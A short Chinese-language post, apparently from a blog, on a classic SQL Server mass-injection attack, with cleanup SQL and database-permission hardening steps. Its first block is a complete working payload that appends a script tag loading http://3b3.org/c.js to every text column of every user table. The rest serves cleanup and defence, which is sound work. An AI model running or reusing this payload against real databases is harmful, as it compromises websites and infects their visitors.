sql注入和反注入
廣告:
注入操作:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where
A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or
B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert
(Varchar(8000),['+@C+']))+''<script
src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
消除注入代碼的逆操作SQL
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where
A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or
B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=replace
(['+@C+'],''<script
src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
徹底杜絕SQL注入
1、不要使用sa用戶連接數據庫。
2、新建一個public權限數據庫用戶,并用這個用戶訪問數據庫。
3、[角色]去掉角色public對sysobjects與syscolumns對象的select訪問權限 。
4、[用戶]用戶名稱-> 右鍵-屬性-權限-在sysobjects與syscolumns上面打“×”。
5、通過以下代碼檢測(失敗表示權限正確,如能顯示出來則表明權限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
廣告:
